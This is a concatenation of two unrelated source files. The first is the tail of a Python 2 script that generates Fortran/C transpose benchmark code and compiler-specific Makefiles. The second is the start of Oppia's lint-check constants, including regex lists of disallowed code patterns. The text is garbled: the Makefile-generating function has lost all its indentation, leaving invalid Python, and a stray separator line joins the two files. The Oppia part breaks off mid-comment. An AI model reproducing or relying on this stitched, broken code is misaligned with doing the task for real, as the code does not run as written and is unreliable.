                ofile.write(' & sorted,reference,errors) \n')
                ofile.write(' else\n')
                ofile.write(' errors = 0\n')
                ofile.write(' endif\n')
                ofile.write(' if (errors.eq.0) then\n')
                ofile.write(' dt(loop,fac,omp) = (t1-t0)\n')
                ofile.write(' else\n')
                ofile.write(' dt(loop,fac,omp) = 10000000.0\n')
                ofile.write(' print*,\''+subroutine_name+'\'\n')
                ofile.write(' print*,\'errors = \',errors \n')
                ofile.write(' call print_4d_arrays(dim1,dim2,dim3,dim4,\n')
                ofile.write(' & sorted,reference) \n')
                ofile.write(' endif\n')
    # Emitted once, after all timing loops: report the fastest loop order for
    # every (fac, omp) combination, relative to the matching reference time.
    ofile.write('!*************************************************\n')
    ofile.write('! determine the best time and loop order for each of (fac,omp)\n')
    ofile.write(' write(6,2000) '+str(A)+','+str(B)+','+str(C)+','+str(D)+'\n')
    ofile.write(' write(6,1500) \'old_sort_4 \',dt0,(8*dim1*dim2*dim3*dim4)/dt0\n')
    ofile.write(' write(6,1500) \'old_sortacc_4\',dt1,(8*dim1*dim2*dim3*dim4)/dt1\n')
    ofile.write(' do omp = 1, 2\n')
    ofile.write(' do fac = 1, 5\n')
    ofile.write(' ! make sure these are right for the fac cases at hand \n')
    ofile.write(' if (fac.le.2) dtX = dt0 \n')
    ofile.write(' if (fac.gt.2) dtX = dt1 \n')
    ofile.write(' besttime(fac,omp) = 1000000.0\n')
    ofile.write(' do loop = 1, 24\n')
    ofile.write(' if (dt(loop,fac,omp).lt.besttime(fac,omp)) then\n')
    ofile.write(' besttime(fac,omp) = dt(loop,fac,omp)\n')
    ofile.write(' bestloop(1,fac,omp) = loops(1,loop)\n')
    ofile.write(' bestloop(2,fac,omp) = loops(2,loop)\n')
    ofile.write(' bestloop(3,fac,omp) = loops(3,loop)\n')
    ofile.write(' bestloop(4,fac,omp) = loops(4,loop)\n')
    ofile.write(' endif\n')
    ofile.write(' enddo\n')
    ofile.write(' if (besttime(fac,omp).lt.1000000.0) then\n')
    ofile.write(' write(6,1000) \'best \',labels(omp,fac),\n')
    ofile.write(' & bestloop(1,fac,omp),bestloop(2,fac,omp),\n')
    ofile.write(' & bestloop(3,fac,omp),bestloop(4,fac,omp),\n')
    ofile.write(' & besttime(fac,omp),dtX/besttime(fac,omp),\n')
    ofile.write(' & (8*dim1*dim2*dim3*dim4)/besttime(fac,omp)\n')
    ofile.write(' endif\n')
    ofile.write(' enddo\n')
    ofile.write(' enddo\n')
    ofile.write(' return\n')
    ofile.write(' 1000 format(1x,a8,a22,\' = \',4i1,1x,f9.6,1x,\'(\',f7.3,\'x,\',e10.3,\' B/s)\')\n')
    ofile.write(' 1500 format(11x,a13,7x,\' = \',5x,f9.6,1x,\'(\',9x,e10.3,\' B/s)\')\n')
    ofile.write(' 2000 format(1x,\'transpose: \',4i1)\n')
    ofile.write(' end\n')
    return
def generate_test_driver(Debug, Compiler, subdir, underscoring, rev, flags):
    """Writes test_trans_all.c (the C main() driver) and test_trans_all.h.

    The driver allocates three aligned work arrays and calls the generated
    Fortran tester subroutine for every transpose order and source language.

    Args:
        Debug: bool. Passed through to generate_permutation_list().
        Compiler: str. Compiler name, echoed into the run banner.
        subdir: str. Output directory for the generated files.
        underscoring: str. '' or '_'; Fortran symbol-name suffix appended to
            the C-side names.
        rev: int. Generator revision echoed into the run banner.
        flags: str. Compile flags echoed into the run banner.
    """
    oname = 'test_trans_all'
    cfile = open(subdir+'/'+oname+'.c','w')
    hfile = open(subdir+'/'+oname+'.h','w')
    cfile.write('#include <stdio.h>\n')
    cfile.write('#include <stdlib.h>\n')
    cfile.write('#include <string.h>\n')
    cfile.write('#include <assert.h>\n\n')
    cfile.write('int posix_memalign(void **memptr, size_t alignment, size_t size); \n\n')
    cfile.write('#ifdef _OPENMP\n')
    cfile.write('#include <omp.h>\n')
    cfile.write('#endif\n\n')
    cfile.write('#ifdef USE_MPI\n')
    cfile.write('#include <mpi.h>\n')
    cfile.write('#endif\n\n')
    cfile.write('#include \"'+oname+'.h\"\n\n')
    cfile.write('int main(int argc, char * argv[])\n')
    cfile.write('{\n')
    cfile.write(' int rc;\n')
    cfile.write(' int dim1 = (argc>1) ? atoi(argv[1]) : 30;\n')
    cfile.write(' int dim2 = (argc>2) ? atoi(argv[2]) : 30;\n')
    cfile.write(' int dim3 = (argc>3) ? atoi(argv[3]) : 30;\n')
    cfile.write(' int dim4 = (argc>4) ? atoi(argv[4]) : 30;\n')
    cfile.write(' int size = dim1*dim2*dim3*dim4;\n\n')
    cfile.write('#ifdef _OPENMP\n')
    cfile.write(' int nthreads = omp_get_max_threads();\n')
    cfile.write('#else\n')
    cfile.write(' int nthreads = 1;\n')
    cfile.write('#endif\n\n')
    cfile.write(' printf(\"SPAGHETTY: generator2.py r'+str(rev)+'\\n\");\n')
    cfile.write(' printf(\"dims = %d,%d,%d,%d - OpenMP threads = %d \\n\", dim1, dim2, dim3, dim4, nthreads);\n')
    cfile.write(' printf(\"%s compiler: %s \\n\", \"'+Compiler+'\",\"'+flags+'\");\n\n')
    cfile.write(' fflush(stdout);\n')
    cfile.write(' double * unsorted = NULL;\n')
    cfile.write(' double * sorted = NULL;\n')
    cfile.write(' double * reference = NULL;\n\n')
    cfile.write(' rc = posix_memalign((void**)&unsorted, 128, size*sizeof(double)); assert(rc==0 && unsorted!=NULL);\n')
    cfile.write(' rc = posix_memalign((void**)&sorted, 128, size*sizeof(double)); assert(rc==0 && sorted!=NULL);\n')
    cfile.write(' rc = posix_memalign((void**)&reference, 128, size*sizeof(double)); assert(rc==0 && reference!=NULL);\n\n')
    cfile.write(' /*********** begin testing **********/\n\n')
    for Language in ['f','c']:
        for transpose_order in generate_permutation_list(Debug):
            test_name = 'trans_'+perm_to_string(transpose_order)+'_'+Language+underscoring
            cfile.write(' test_'+test_name+'(reference, unsorted, sorted, &dim1, &dim2, &dim3, &dim4);\n')
            # BUG FIX: the emitted prototype previously named its parameters
            # (unsorted, sorted, reference), contradicting both the call above
            # and the Fortran declaration (reference, unsorted, sorted).  All
            # parameters are double*, so the old code linked, but the header
            # was misleading; the names now match the actual argument order.
            hfile.write('void test_'+test_name+'(double * reference, double * unsorted, double * sorted,\n')
            hfile.write(' int * dim1, int * dim2, int * dim3, int * dim4);\n')
    cfile.write(' /* end testing */\n')
    cfile.write(' free(reference);\n')
    cfile.write(' free(sorted);\n')
    cfile.write(' free(unsorted);\n\n')
    cfile.write(' return 0;\n')
    cfile.write('}\n\n')
    cfile.close()
    hfile.close()
def generate_all_subroutines(Debug, Compiler, subdir, underscoring):
    """Generates every tester (.F) and every transpose-variant source file
    (.f or .c) under subdir, for all transpose orders and loop orders.

    Args:
        Debug: bool. When True, use fewer timing repetitions (and whatever
            reduced permutation set generate_permutation_list provides).
        Compiler: unused in this function; kept for a uniform interface.
        subdir: str. Output directory.
        underscoring: str. '' or '_'; appended to generated C function names
            so they match the symbol names the Fortran side expects.
    """
    if (Debug):
        reps = 5
    else:
        reps = 15
    for transpose_order in generate_permutation_list(Debug):
        for Language in ['f','c']:
            source_name = 'test_trans_'+perm_to_string(transpose_order)+'_'+Language
            source_file = open(subdir+'/'+source_name+'.F','w')
            generate_tester(source_file, transpose_order, reps, Language)
            source_file.close()
            for loop_order in generate_permutation_list(Debug):
                # The on-disk file name carries the language suffix...
                source_name = 'trans_'+perm_to_string(transpose_order)+'_loop_'+perm_to_string(loop_order)+'_'+Language
                source_file = open(subdir+'/'+source_name+'.'+Language,'w')
                # ...but source_name is immediately rebuilt WITHOUT the
                # suffix, because the subroutine names below append their own
                # variant suffix.  The order of these assignments matters.
                source_name = 'trans_'+perm_to_string(transpose_order)+'_loop_'+perm_to_string(loop_order)
                for OpenMP in [False,True]:
                    (omp_name,omp_text) = get_omp_info(OpenMP)
                    variant = omp_name+'_'+Language
                    print 'generating '+source_name+'_'+variant
                    if (Language=='f'):
                        subroutine_name = source_name+'_'+variant
                        description = '! '+omp_text+'\n'
                        generate_subroutine(source_file, subroutine_name, description, OpenMP, transpose_order, loop_order)
                    if (Language=='c'):
                        cfunction_name = source_name+'_'+variant+underscoring
                        description = '/* '+omp_text+' */\n'
                        generate_cfunction(source_file, cfunction_name, description, OpenMP, transpose_order, loop_order)
                # One file holds both the serial and OpenMP variants.
                source_file.close()
def generate_makefile(Debug, subdir, Compiler, rev):
makefile = open(subdir+'/Makefile','w')
if (Compiler=='GNU' or Compiler=='BGP-GNU' or Compiler=='BGQ-GNU' or Compiler=='Mac'):
if (Compiler=='GNU'):
makefile.write('CC = gcc \n')
makefile.write('FC = gfortran \n')
if (Compiler=='BGP-GNU'):
print 'You need to use the GCC 4.3.2 version not the default...'
makefile.write('CC = powerpc-bgp-linux-gcc \n')
makefile.write('FC = powerpc-bgp-linux-gfortran \n')
if (Compiler=='BGQ-GNU'):
makefile.write('CC = powerpc64-bgq-linux-gcc \n')
makefile.write('FC = powerpc64-bgq-linux-gfortran \n')
makefile.write('LD = $(FC) \n')
makefile.write('OMPFLAGS = -fopenmp \n')
makefile.write('CFLAGS = -std=c99 $(OMPFLAGS) \n')
makefile.write('FFLAGS = -fno-underscoring $(OMPFLAGS) \n')
if (Debug):
makefile.write('RFLAGS = -g -O0 -Wall \n')
makefile.write('OFLAGS = -g -O0 -Wall \n')
else:
makefile.write('RFLAGS = -O1 \n')
makefile.write('OFLAGS = -Os \n')
flags = '-fopenmp -std=c99 -fno-underscoring -O3'
makefile.write('LDFLAGS = $(FFLAGS) $(RFLAGS) \n')
makefile.write('SFLAGS = -fverbose-asm \n\n')
elif (Compiler=='LLVM' or Compiler=='BGQ-LLVM'):
if (Compiler=='LLVM'):
makefile.write('CC = clang \n')
makefile.write('FC = gfortran \n')
if (Compiler=='BGQ-LLVM'):
makefile.write('CC = bgclang \n')
makefile.write('FC = powerpc64-bgq-linux-gfortran \n')
makefile.write('LD = $(FC) \n')
makefile.write('OMPFLAGS = -fopenmp \n')
makefile.write('CFLAGS = -std=c99 $(OMPFLAGS) \n')
makefile.write('FFLAGS = -fno-underscoring $(OMPFLAGS) \n')
if (Debug):
makefile.write('RFLAGS = -g -O0 -Wall \n')
makefile.write('OFLAGS = -g -O0 -Wall \n')
else:
makefile.write('RFLAGS = -O2 \n')
makefile.write('OFLAGS = -O3 \n')
flags = '-fopenmp -std=c99 -fno-underscoring -O3'
makefile.write('LDFLAGS = $(FFLAGS) $(RFLAGS) \n')
makefile.write('SFLAGS = -fverbose-asm \n\n')
elif (Compiler=='Intel'):
makefile.write('CC = icc \n')
makefile.write('FC = ifort \n')
makefile.write('LD = $(FC) \n')
makefile.write('OMPFLAGS = -openmp \n')
makefile.write('CFLAGS = -std=c99 $(OMPFLAGS) \n')
makefile.write('FFLAGS = -assume nounderscore $(OMPFLAGS) \n')
if (Debug):
makefile.write('RFLAGS = -g -O0 \n')
makefile.write('OFLAGS = -g -O0 \n')
else:
makefile.write('RFLAGS = -O2 \n')
makefile.write('OFLAGS = -O3 -mavx \n')
flags = '-openmp -std=c99 -assume nounderscore -O3 -mavx'
makefile.write('LDFLAGS = $(FFLAGS) $(RFLAGS) -nofor-main \n')
makefile.write('SFLAGS = -fsource-asm -fverbose-asm -fcode-asm \n\n')
elif (Compiler=='XL' or Compiler=='BG-XL'):
if (Compiler=='XL'):
makefile.write('CC = xlc_r \n')
makefile.write('FC = xlf_r \n')
if (Compiler=='BG-XL'):
makefile.write('CC = bgxlc_r \n')
makefile.write('FC = bgxlf_r \n')
makefile.write('LD = $(FC) \n')
makefile.write('OMPFLAGS = -qsmp=omp \n')
makefile.write('CFLAGS = -qlanglvl=stdc99 $(OMPFLAGS) \n')
makefile.write('FFLAGS = $(OMPFLAGS) \n')
if (Debug):
makefile.write('RFLAGS = -g -O3 -qstrict \n')
makefile.write('OFLAGS = -g -O3 -qstrict \n')
else:
makefile.write('RFLAGS = -g -O3 -qstrict \n')
makefile.write('OFLAGS = -g -O3 -qhot -qsimd=auto \n')
flags = '-qsmp=omp -qlanglvl=stdc99 -g -O3 -qhot -qsimd=auto'
makefile.write('LDFLAGS = $(FFLAGS) $(RFLAGS) \n')
makefile.write('SFLAGS = -qlist -qlistopt -qreport -qsource \n\n')
elif (Compiler=='Cray'):
makefile.write('CC = craycc \n')
makefile.write('FC = crayftn \n')
makefile.write('LD = $(FC) \n')
makefile.write('OMPFLAGS = -h thread3 \n')
makefile.write('CFLAGS = -h c99 $(OMPFLAGS) \n')
makefile.write('FFLAGS = $(OMPFLAGS) \n')
if (Debug):
makefile.write('RFLAGS = -g -O0 \n')
makefile.write('OFLAGS = -g -O0 \n')
else:
makefile.write('RFLAGS = -O2 \n')
makefile.write('OFLAGS = -O3 \n')
flags = '-h thread3 -h c99 -O3'
makefile.write('LDFLAGS = $(FFLAGS) $(RFLAGS) \n')
makefile.write('SFLAGS = \n\n')
else:
print 'you must define Compiler'
exit()
makefile.write('\n\n')
makefile.write('SOURCES = \\\n')
for Language in ['f','c']:
for transpose_order in generate_permutation_list(Debug):
source_name = 'test_trans_'+perm_to_string(transpose_order)+'_'+Language
makefile.write(source_name+'.F \\\n')
for transpose_order in generate_permutation_list(Debug):
for loop_order in generate_permutation_list(Debug):
source_name = 'trans_'+perm_to_string(transpose_order)+'_loop_'+perm_to_string(loop_order)+'_'+Language
makefile.write(source_name+'.f \\\n')
makefile.write('\n\n')
makefile.write('ROBJECTS = \\\n')
for Language in ['f','c']:
for transpose_order in generate_permutation_list(Debug):
source_name = 'test_trans_'+perm_to_string(transpose_order)+'_'+Language
makefile.write(source_name+'.o \\\n')
makefile.write('\n\n')
makefile.write('OBJECTS = \\\n')
for Language in ['f','c']:
for transpose_order in generate_permutation_list(Debug):
for loop_order in generate_permutation_list(Debug):
source_name = 'trans_'+perm_to_string(transpose_order)+'_loop_'+perm_to_string(loop_order)+'_'+Language
makefile.write(source_name+'.o \\\n')
makefile.write('\n\n')
makefile.write('ASSEMBLY = \\\n')
for Language in ['f','c']:
for transpose_order in generate_permutation_list(Debug):
for loop_order in generate_permutation_list(Debug):
source_name = 'trans_'+perm_to_string(transpose_order)+'_loop_'+perm_to_string(loop_order)+'_'+Language
makefile.write(source_name+'.s \\\n')
for transpose_order in generate_permutation_list(Debug):
source_name = 'test_trans_'+perm_to_string(transpose_order)
makefile.write(source_name+'.s \\\n')
makefile.write('\n\n')
makefile.write('TESTOBJ = tester_cutil.o tester_futil.o old_sort.o \n\n')
makefile.write('all: test_trans_all.x \n\n')
makefile.write('%.x: %.o libtestutil.a libspaghetty.a \n')
makefile.write('\t$(LD) $(LDFLAGS) $< -L. -ltestutil -lspaghetty -o $@ \n\n')
makefile.write('libspaghetty.a: $(OBJECTS) \n')
makefile.write('\t$(AR) $(ARFLAGS) $@ $(OBJECTS) \n\n')
makefile.write('libtestutil.a: $(TESTOBJ) $(ROBJECTS) \n')
makefile.write('\t$(AR) $(ARFLAGS) $@ $(TESTOBJ) $(ROBJECTS) \n\n')
makefile.write('asm: $(ASSEMBLY) \n\n')
makefile.write('%.s: %.f \n')
makefile.write('\t$(FC) $(FFLAGS) $(OFLAGS) $(SFLAGS) -S $< -o $@ \n\n')
makefile.write('%.s: %.c \n')
makefile.write('\t$(CC) $(CFLAGS) $(OFLAGS) $(SFLAGS) -S $< -o $@ \n\n')
makefile.write('%.o: %.F \n')
makefile.write('\t$(FC) $(FFLAGS) $(RFLAGS) -c $< -o $@ \n\n')
makefile.write('%.o: %.f \n')
makefile.write('\t$(FC) $(FFLAGS) $(OFLAGS) -c $< -o $@ \n\n')
makefile.write('%.o: %.c \n')
makefile.write('\t$(CC) $(CFLAGS) $(OFLAGS) -c $< -o $@ \n\n')
makefile.write('clean: \n')
makefile.write('\t$(RM) $(RMFLAGS) test_trans_all.o $(OBJECTS) $(TESTOBJ) $(ASSEMBLY) \n\n')
makefile.write('realclean: clean \n')
makefile.write('\t$(RM) $(RMFLAGS) test_trans_all.x libspaghetty.a libtestutil.a \n\n')
makefile.write('srcclean: realclean \n')
makefile.write('\t$(RM) $(RMFLAGS) $(SOURCES) \n\n')
makefile.close()
generate_test_driver(Debug, Compiler, subdir, underscoring, rev, flags)
return
# ---------------------------------------------------------------------------
# Command-line driver:  generator2.py <Compiler> [Debug]
# ---------------------------------------------------------------------------
compilers = ['GNU','BGP-GNU','BGQ-GNU','Intel','XL','BG-XL','Cray','Mac','LLVM','BGQ-LLVM']
if len(sys.argv)>1:
    Compiler = str(sys.argv[1])
    if Compiler not in compilers:
        print Compiler+' is not a valid compiler choice'
        exit()
else:
    print 'Please choose a compiler from GNU, BGP-GNU, BGQ-GNU, Intel, XL, BG-XL, Cray, Mac, LLVM, BGQ-LLVM'
    exit()
# A second argument literally equal to 'Debug' enables the reduced test set.
if len(sys.argv)>2:
    Debug = (str(sys.argv[2])=='Debug')
else:
    Debug = False
# Cray appends an underscore to Fortran symbols; the other toolchains are
# driven with no-underscore flags in generate_makefile.
if (Compiler in ['GNU','BGP-GNU','BGQ-GNU','Intel','XL','BG-XL','Mac','LLVM','BGQ-LLVM']):
    underscoring=''
elif (Compiler in ['Cray']):
    underscoring='_'
if Debug:
    subdir = str(Compiler)+'-Debug'
else:
    subdir = str(Compiler)
# Revision is hard-coded; the svn lookups below were abandoned.
#rev = os.system('svn info generator2.py | grep Revision | sed "s/Revision: //g"')
#rev = subprocess.check_output('svn info generator2.py | grep Revision | sed "s/Revision: //g"')
#print 'rev = ',str(rev)
#exit()
rev = 242
os.system('mkdir '+subdir)
os.system('cp tester_cutil.c tester_futil.F old_sort.f '+subdir+'/.')
generate_all_subroutines(Debug, Compiler, subdir, underscoring)
generate_makefile(Debug, subdir, Compiler, rev)
| |
# coding: utf-8
#
# Copyright 2020 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Lint checks used by all the linters."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import os
import re
import python_utils
from . import js_ts_linter
from . import warranted_angular_security_bypasses
from .. import common
from .. import concurrent_task_utils
# Glob-style path patterns skipped by every lint pass: third-party and
# generated code, binary assets, build output, and test fixture data.
EXCLUDED_PATHS = (
    'third_party/*', 'build/*', '.git/*', '*.pyc', 'CHANGELOG',
    'integrations/*', 'integrations_dev/*', '*.svg', '*.gif', '*.png',
    '*.webp', '*.zip', '*.ico', '*.jpg', '*.min.js', 'backend_prod_files/*',
    'assets/scripts/*', 'core/domain/proto/*.py', 'core/tests/data/*',
    'core/tests/build_sources/*', '*.mp3', '*.mp4', 'node_modules/*',
    'typings/*', 'local_compiled_js/*', 'webpack_bundles/*',
    'core/tests/services_sources/*', 'core/tests/release_sources/tmp_unzip.zip',
    'scripts/linters/test_files/*',
    'core/tests/release_sources/tmp_unzip.tar.gz',
    'core/templates/combined-tests.spec.ts',
    'core/templates/css/oppia-material.css',
    '%s/*' % js_ts_linter.COMPILED_TYPESCRIPT_TMP_PATH)
# Machine-generated files, excluded from the mandatory-pattern checks below.
GENERATED_FILE_PATHS = (
    'extensions/interactions/LogicProof/static/js/generatedDefaultData.ts',
    'extensions/interactions/LogicProof/static/js/generatedParser.ts',
    'core/templates/expressions/parser.js')
# Tooling/configuration files, also excluded from the mandatory-pattern
# checks below.
CONFIG_FILE_PATHS = (
    'core/tests/.browserstack.env.example',
    'core/tests/protractor.conf.js',
    'core/tests/karma.conf.ts',
    'core/templates/mathjaxConfig.ts',
    'assets/constants.ts',
    'assets/rich_text_components_definitions.ts',
    'webpack.config.ts',
    'webpack.dev.config.ts',
    'webpack.prod.config.ts')
# Strings that MUST be present (e.g. in constants.ts) before committing.
# Maps the required string to its failure message and per-check exclusions.
REQUIRED_STRINGS_CONSTANTS = {
    'DEV_MODE: true': {
        # BUG FIX: the implicit string concatenation was missing a space,
        # producing the message '...constants.tsto true before committing.'.
        'message': 'Please set the DEV_MODE variable in constants.ts '
                   'to true before committing.',
        'excluded_files': ()
    }
}
# Literal substrings that must not appear anywhere in checked files.  Each
# maps to a failure message plus per-pattern file/directory exclusions.
BAD_PATTERNS = {
    '\t': {
        'message': 'Please use spaces instead of tabs.',
        'excluded_files': (),
        'excluded_dirs': (
            'assets/i18n/', 'core/tests/build_sources/assets/')},
    '\r': {
        'message': 'Please make sure all files only have LF endings (no CRLF).',
        'excluded_files': (),
        'excluded_dirs': ()},
    '<<<<<<<': {
        'message': 'Please fully resolve existing merge conflicts.',
        'excluded_files': (),
        'excluded_dirs': ()},
    '>>>>>>>': {
        'message': 'Please fully resolve existing merge conflicts.',
        'excluded_files': (),
        'excluded_dirs': ()},
    'glyphicon': {
        'message': 'Please use equivalent material-icons '
                   'instead of glyphicons.',
        'excluded_files': (),
        'excluded_dirs': ()}
}
# Regex-based checks applied to every file, regardless of file type.
BAD_PATTERNS_REGEXP = [
    {
        'regexp': re.compile(r'TODO[^\(]*[^\)][^:]*[^A-Z]+[^\w]*$'),
        'message': 'Please assign TODO comments to a user '
                   'in the format TODO(username): XXX. ',
        'excluded_files': (),
        'excluded_dirs': ()
    }
]
# Regex-based checks applied to .js and .ts files only.
BAD_PATTERNS_JS_AND_TS_REGEXP = [
    {
        # NOTE(review): the '.' in this pattern (and the three browser.*
        # patterns below) is an unescaped regex wildcard, so e.g.
        # 'browserXexplore(' also matches.  Left as-is to avoid changing
        # which lines are flagged.
        'regexp': re.compile(r'\b(browser.explore)\('),
        'message': 'In tests, please do not use browser.explore().',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\b(browser.pause)\('),
        'message': 'In tests, please do not use browser.pause().',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\b(browser.sleep)\('),
        'message': 'In tests, please do not use browser.sleep().',
        'excluded_files': (
            # TODO(#7622): Remove the file from the excluded list. Remove the
            # TODO in core/tests/protractor_desktop/embedding.js pointing to the
            # same issue. The following was placed due to a necessary sleep as
            # a temporary measure to keep the embedding tests from failing.
            'core/tests/protractor_desktop/embedding.js',
        ),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\b(browser.waitForAngular)\('),
        'message': 'In tests, please do not use browser.waitForAngular().',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'bypass'),
        'message': 'The use of the word "bypass" is not allowed, ' +
                   'particularly with regards to bypassSecurityTrustHTML() ' +
                   'and similar functions in Angular.',
        'excluded_files': (
            warranted_angular_security_bypasses
            .EXCLUDED_BYPASS_SECURITY_TRUST_FILES),
        'excluded_dirs': (
            warranted_angular_security_bypasses
            .EXCLUDED_BYPASS_SECURITY_TRUST_DIRECTORIES)
    },
    {
        'regexp': re.compile(r'\b(ddescribe|fdescribe)\('),
        # BUG FIX: a space was missing between the concatenated fragments,
        # which rendered as "...instead of 'ddescribe'or 'fdescribe'".
        'message': 'In tests, please use \'describe\' instead of \'ddescribe\' '
                   'or \'fdescribe\'',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\b(iit|fit)\('),
        'message': 'In tests, please use \'it\' instead of \'iit\' or \'fit\'',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\b(beforeEach\(inject\(function)\('),
        'message': 'In tests, please use \'angular.mock.inject\' instead of '
                   '\'inject\'',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'templateUrl: \''),
        'message': 'The directives must be directly referenced.',
        'excluded_files': (
            'core/templates/pages/exploration-player-page/'
            'FeedbackPopupDirective.js',
            '.component.ts'
        ),
        'excluded_dirs': (
            'extensions/answer_summarizers/',
            'extensions/classifiers/',
            'extensions/dependencies/',
            'extensions/value_generators/',
            'extensions/visualizations/')
    },
    {
        'regexp': re.compile(r'toThrow[(]'),
        'message': 'Please use \'toThrowError\' instead of '
                   '\'toThrow\'',
        'excluded_files': (
            # Note to developers: In the excluded_files below,
            # we use custom errors which cannot be caught by regex.
            # The Logic Proof interaction which uses these custom errors
            # will be deprecated soon (see #9198).
            'extensions/interactions/LogicProof/static/js/student.spec.ts',
            'extensions/interactions/LogicProof/static/js/complete.spec.ts',
            'extensions/interactions/LogicProof/static/js/teacher.spec.ts'),
        'excluded_dirs': ()
    },
    {
        # BUG FIX: the alternation was missing a '|' between RangeError and
        # SyntaxError ('\bRangeError\bSyntaxError' can never match, since no
        # word boundary exists between two word characters), so bare
        # 'throw RangeError(' and 'throw SyntaxError(' were never flagged.
        'regexp': re.compile(
            r'(?!catch\s(\n|.)*throw\s\w+;\n.*})'
            r'throw\s\b(\bError|\bTypeError|\bRangeError|'
            r'\bSyntaxError|\bDimensionError)\('),
        'message': 'Please use \'throw new\' instead of \'throw\'',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(
            r'(?!catch\s(\n|.)*throw\s\w+;\n.*})throw\s\'.*\';'),
        'message': 'Please use '
                   '\'throw new Error\' instead of \'throw\'',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\$parent'),
        # BUG FIX: a space was missing after 'object', which rendered as
        # '...Use the scope objectfor this purpose.'.
        'message': 'Please do not access parent properties ' +
                   'using $parent. Use the scope object ' +
                   'for this purpose.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'require\(.*\.\..*\);'),
        'message': 'Please, don\'t use relative imports in require().',
        'excluded_files': (),
        'excluded_dirs': ('core/tests/',)
    },
    {
        'regexp': re.compile(r'innerHTML'),
        'message': 'Please do not use innerHTML property.',
        'excluded_files': (
            'core/templates/Polyfills.ts',
            'core/templates/filters/translate.pipe.spec.ts',
            'core/templates/components/ck-editor-helpers/' +
            'ck-editor-copy-content-service.spec.ts',
            'core/templates/tests/unit-test-utils.ts'),
        'excluded_dirs': ('core/tests/',)
    },
    {
        'regexp': re.compile(
            r'eslint-(disable|enable)(-next-line)? camelcase'),
        'message': (
            'Please do not use eslint disable for camelcase. '
            'If you are using this statement to define properties '
            'in an interface for a backend dict. Wrap the property '
            'name in single quotes instead.'),
        'excluded_files': (
            'typings/guppy-defs-b5055b963fdbea5c6c1e92dbf58fdaf3ea0cd8ba.d.ts',
            'core/templates/services/UpgradedServices.ts'),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'no-explicit-any'),
        'message': (
            'Please do not define "any" types. You can refer '
            'https://github.com/oppia/oppia/wiki/Guide-on-defining-types '
            'if you\'re having trouble declaring types.'),
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\$broadcast'),
        'message': (
            'Please do not use $broadcast/$on for propagating events. '
            'Use @Input/@Output instead.'),
        'excluded_files': (
            'core/templates/pages/exploration-editor-page/translation-tab/'
            'audio-translation-bar/audio-translation-bar.directive.spec.ts',
            'core/templates/pages/library-page/search-bar/'
            'search-bar.component.spec.ts'),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'import \{.*\} from \'lodash\''),
        'message': (
            'Please do not use "import { someFunction } from \'lodash\'". '
            'Use "import someFunction from \'lodash/someFunction\'" instead.'),
        'excluded_files': (),
        'excluded_dirs': ()
    }
]
# Patterns that MUST be present in files of the listed types (unless the
# file is generated, a config file, or under an excluded path).
MANDATORY_PATTERNS_REGEXP = [
    {
        'regexp': re.compile(
            r'Copyright \d{4} The Oppia Authors\. All Rights Reserved\.'),
        'message': 'Please ensure this file should contain a proper '
                   'copyright notice.',
        'included_types': ('.py', '.js', '.sh', '.ts'),
        'excluded_files': GENERATED_FILE_PATHS + CONFIG_FILE_PATHS + (
            '__init__.py', ),
        'excluded_dirs': EXCLUDED_PATHS
    },
    {
        'regexp': re.compile('from __future__ import unicode_literals'),
        'message': 'Please ensure this file should contain unicode_literals '
                   'future import.',
        # BUG FIX: ('.py') is just the parenthesized string '.py', not a
        # tuple; the trailing comma makes it a 1-tuple, consistent with the
        # 'included_types' entry above.
        'included_types': ('.py',),
        'excluded_files': GENERATED_FILE_PATHS + CONFIG_FILE_PATHS + (
            '__init__.py',),
        'excluded_dirs': EXCLUDED_PATHS
    }
]
# Patterns that MUST be present in .js/.ts files.
MANDATORY_PATTERNS_JS_REGEXP = [
    {
        'regexp': re.compile(r'^\s\*\s@fileoverview\s[a-zA-Z0-9_]+'),
        'message': 'Please ensure this file should contain a file '
                   'overview i.e. a short description of the file.',
        'included_types': ('.js', '.ts'),
        'excluded_files': GENERATED_FILE_PATHS + CONFIG_FILE_PATHS,
        'excluded_dirs': EXCLUDED_PATHS
    }
]
# Regex-based, per-line checks applied to .html files only.
BAD_LINE_PATTERNS_HTML_REGEXP = [
    {
        'regexp': re.compile(r'text\/ng-template'),
        'message': 'The directives must be directly referenced.',
        'excluded_files': (),
        'excluded_dirs': (
            'extensions/answer_summarizers/',
            'extensions/classifiers/',
            'extensions/objects/',
            'extensions/value_generators/')
    },
    {
        'regexp': re.compile(r'[ \t]+$'),
        'message': 'There should not be any trailing whitespaces.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\$parent'),
        'message': 'Please do not access parent properties ' +
                   'using $parent. Use the scope object ' +
                   'for this purpose.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\s+style\s*=\s*'),
        'message': 'Please do not use inline styling.',
        'excluded_files': (),
        'excluded_dirs': ()
    }
]
# Regex-based checks applied to .py files only.  Most entries steer authors
